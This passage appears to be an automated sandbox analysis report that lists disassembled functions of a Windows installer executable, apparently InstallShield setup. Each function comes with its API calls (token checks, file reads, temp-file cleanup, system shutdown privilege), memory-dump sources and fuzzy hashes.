                                                                                                                                                                          • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 00439A49
                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00439A7A
                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00439A97
                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 00439AB4
                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 00439AD1
                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 00439AF2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$CreateKnownWell$DescriptorH_prolog3_InitializeSecurity
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4043395516-0
                                                                                                                                                                          • Opcode ID: 94f4678e800f36294582641efb31ff13167fc3b98282fc3aecc92f6f0d708559
                                                                                                                                                                          • Instruction ID: 0bb9dfac39cc9f6483e3637b6053f8f96747508944d7e48eba2a71e045ef4183
                                                                                                                                                                          • Opcode Fuzzy Hash: 94f4678e800f36294582641efb31ff13167fc3b98282fc3aecc92f6f0d708559
                                                                                                                                                                          • Instruction Fuzzy Hash: 8191B8B1D4122DAEDB60DF96CD84BDEBBBCBB08340F5041ABE509E6240D7749E848F64
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0044E1E6, Relevance: 26.8, APIs: 14, Strings: 1, Instructions: 537COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 0-1835203436
                                                                                                                                                                          • Opcode ID: 1e6e248b147c6d9097be45b0931ff6ef54a1f22e1976a0f7a40abbe5c405ef26
                                                                                                                                                                          • Instruction ID: fced7fb91f148b554aa4748008c70e08e3513c0119bdde9e1eefdf5080addb56
                                                                                                                                                                          • Opcode Fuzzy Hash: 1e6e248b147c6d9097be45b0931ff6ef54a1f22e1976a0f7a40abbe5c405ef26
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F327075B022289FEB24CF56DC406EAB7B5FB06314F0841DAE40AE7A91D7349E81CF56
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004403BB, Relevance: 19.6, APIs: 13, Instructions: 104threadmemoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004403C2
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 004403D9
                                                                                                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004403E0
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004403F0
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004403FF
                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 00440406
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 0044040C
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 0044042F
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 00440435
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 0044045A
                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00440477
                                                                                                                                                                          • EqualSid.ADVAPI32(00000004,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 00440492
                                                                                                                                                                          • FreeSid.ADVAPI32(?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004404B2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Token$ErrorLast$CurrentInformationOpenProcessThread$AllocateEqualFreeH_prolog3_Initialize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2153409075-0
                                                                                                                                                                          • Opcode ID: 362b57371d312c820e27fe210cd882d39df30997a4f031bf30fa55d35ffd89d7
                                                                                                                                                                          • Instruction ID: 1a281683d798c3f8b9f7c62d97eee49e2bcaa89c7765308c52ffe9046ff4ecd7
                                                                                                                                                                          • Opcode Fuzzy Hash: 362b57371d312c820e27fe210cd882d39df30997a4f031bf30fa55d35ffd89d7
                                                                                                                                                                          • Instruction Fuzzy Hash: 35318D71D00219AFEB109FE0DC49AAE7BB9FF08355F50403AE741F61A0D7388D528B68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00419AD9, Relevance: 18.1, APIs: 12, Instructions: 104memoryfileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419AF2
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000001,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B13
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B1A
                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF), ref: 00419B38
                                                                                                                                                                          • _strlen.LIBCMT ref: 00419B47
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B7C
                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B83
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000003,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B93
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B9A
                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF), ref: 00419BB4
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419BD2
                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419BD9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$Process$File$AllocFreeRead$Size_strlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3537955524-0
                                                                                                                                                                          • Opcode ID: 0b3569c417eed3e89c3a4bed03021a3410356841ba9018f40c9af4e24b11d9a1
                                                                                                                                                                          • Instruction ID: a64d6fe9aef3a7ba32392a0484c250c8f7ac19bd419625298ff7b98670b9c8c1
                                                                                                                                                                          • Opcode Fuzzy Hash: 0b3569c417eed3e89c3a4bed03021a3410356841ba9018f40c9af4e24b11d9a1
                                                                                                                                                                          • Instruction Fuzzy Hash: 10312431A04201BBDB10ABA5DC0CFDB7BADFF49314F01052AF509D6191CB34AC84CB68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042A5EF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105filetimeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0042A5F9
                                                                                                                                                                          • _memset.LIBCMT ref: 0042A619
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,?), ref: 0042A62D
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0042A6B5
                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?), ref: 0042A6DF
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000001,?,?,00000001), ref: 0042A761
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0042A77E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLast$FindFreeString$CompareDeleteFirstH_prolog3_NextPathTempTime_memset
                                                                                                                                                                          • String ID: *.mst
                                                                                                                                                                          • API String ID: 2018102183-516677590
                                                                                                                                                                          • Opcode ID: 47b652e8d3ad024fa999bdce82821c00df54335db485a37fbf3d77e33f6ed083
                                                                                                                                                                          • Instruction ID: b3e7cf4e9c8bfe22a8c324cea388b1e5a2ac4153066a397a48a4969ef7f13115
                                                                                                                                                                          • Opcode Fuzzy Hash: 47b652e8d3ad024fa999bdce82821c00df54335db485a37fbf3d77e33f6ed083
                                                                                                                                                                          • Instruction Fuzzy Hash: 66415F31900269DADB10EBA0CC55BEEB7B8BF15304F4081EAE149A7091EFB45B84CF96
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00440314, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0044031B
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00456C54: __EH_prolog3_GS.LIBCMT ref: 00456C5B
                                                                                                                                                                          • LoadLibraryW.KERNEL32(-00000004,COMCTL32,?,00000001,00000074,0043CA17,?,00000001,clone_wait,00000000,00000001,00000001,Relaunching setup from temp,?,00000001,Setup.cpp), ref: 00440356
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00440383
                                                                                                                                                                          • #17.COMCTL32 ref: 004403A3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$AddressH_prolog3LibraryLoadProc
                                                                                                                                                                          • String ID: $COMCTL32$InitCommonControlsEx
                                                                                                                                                                          • API String ID: 1649272465-1772614818
                                                                                                                                                                          • Opcode ID: ae267aad3622e8362ed36a6c1b4be319410a88d0d50426d4fb658746908c8e15
                                                                                                                                                                          • Instruction ID: 6bb33c0ed157ba849518c5bb9a96d22d821b1174db3a2efd95adbd8c7cff7cff
                                                                                                                                                                          • Opcode Fuzzy Hash: ae267aad3622e8362ed36a6c1b4be319410a88d0d50426d4fb658746908c8e15
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B115B70804218DFEB10EBA4CD49B9D7BB8AF10308F64416EE445A3192DB785A09CB5A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045895B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50shutdownCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,0000000A,Startup,?), ref: 00458974
                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,?,?,?,?,?,?,?,?,00000000,0000000A,Startup,?), ref: 00458981
                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00458998
                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004589C3
                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,0000FFFF), ref: 004589D1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                                          • API String ID: 1314775590-3733053543
                                                                                                                                                                          • Opcode ID: ea8fa3837fad92b639545c942de9f556e1441be13a6613e85d1001e03d49e12d
                                                                                                                                                                          • Instruction ID: 8f08c48101e60e9af304734d92f039aaffca5365822e166c0e7430c27466cd51
                                                                                                                                                                          • Opcode Fuzzy Hash: ea8fa3837fad92b639545c942de9f556e1441be13a6613e85d1001e03d49e12d
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B0121B1A00219ABDB10EFE5DD49EFFBBB8FF09705F000029E509E2291DB749544CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004594D0, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,GetNativeSystemInfo,?,00457A42,?,?,?,?,?,?,?,?,00457A1F,004210F7), ref: 004594DD
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004594E4
                                                                                                                                                                          • GetSystemInfo.KERNEL32(BzE,?,00457A42,?,?,?,?,?,?,?,?,00457A1F,004210F7), ref: 004594F1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleInfoModuleProcSystem
                                                                                                                                                                          • String ID: BzE$GetNativeSystemInfo$kernel32
                                                                                                                                                                          • API String ID: 1167836806-3911614205
                                                                                                                                                                          • Opcode ID: cc0d321c17ed721df0cc657c216c20be59d9c28346d9642c2746c2492da380b8
                                                                                                                                                                          • Instruction ID: f00f38b57aeac7f931a8a09ca3bddd79efdca287aa47268e09fb3ab04aa300d4
                                                                                                                                                                          • Opcode Fuzzy Hash: cc0d321c17ed721df0cc657c216c20be59d9c28346d9642c2746c2492da380b8
                                                                                                                                                                          • Instruction Fuzzy Hash: 66D0A93124020ABB8E002FE5AC0D92E3B5DEA41A663910822F40C80613EA2A99808B1C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00418579, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindResourceW.KERNEL32(?,?,?), ref: 0041858A
                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00418596
                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004185A2
                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004185A9
                                                                                                                                                                            • Part of subcall function 00418404: __EH_prolog3_GS.LIBCMT ref: 0041840E
                                                                                                                                                                            • Part of subcall function 00418404: _memmove.LIBCMT ref: 004184E2
                                                                                                                                                                            • Part of subcall function 00418404: _memmove.LIBCMT ref: 00418502
                                                                                                                                                                            • Part of subcall function 00418404: GetWindowDC.USER32(00000000), ref: 0041850C
                                                                                                                                                                            • Part of subcall function 00418404: CreateDIBitmap.GDI32(00000000,00000000,00000004,?,00000000,00000000), ref: 00418524
                                                                                                                                                                            • Part of subcall function 00418404: ReleaseDC.USER32 ref: 0041854F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Resource$_memmove$BitmapCreateFindH_prolog3_LoadLockReleaseSizeofWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 494462844-0
                                                                                                                                                                          • Opcode ID: f6747669bfee5da85a366a45766eac3db6e4d47719d1d7b92c91e0582118db7a
                                                                                                                                                                          • Instruction ID: e0c5efddd6b4ef5b005f5174a80a1990ea1978f55c594150333c46b7d507938a
                                                                                                                                                                          • Opcode Fuzzy Hash: f6747669bfee5da85a366a45766eac3db6e4d47719d1d7b92c91e0582118db7a
                                                                                                                                                                          • Instruction Fuzzy Hash: F7E0C036101218BF8F512F65EC4CC9B3F6EEB892A17014069F90D86122DA369891DBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0044A9EE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,HsG,00443FB0,?,00000001), ref: 0044A9F3
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0044A9FC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3192549508-1835203436
                                                                                                                                                                          • Opcode ID: efe467880f15d172d13d48c7834ea5daa1aa95f23f53234417b2f6d97d77ad49
                                                                                                                                                                          • Instruction ID: 2d8b31a25deea2f2380808392b572cba4f53bf1497d61823b305e945473b5d55
                                                                                                                                                                          • Opcode Fuzzy Hash: efe467880f15d172d13d48c7834ea5daa1aa95f23f53234417b2f6d97d77ad49
                                                                                                                                                                          • Instruction Fuzzy Hash: 5DB09231144608ABCB803B96EC09B483F2AEB04752F0140A0FA0D44072CB6258908A9A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043FC89, Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
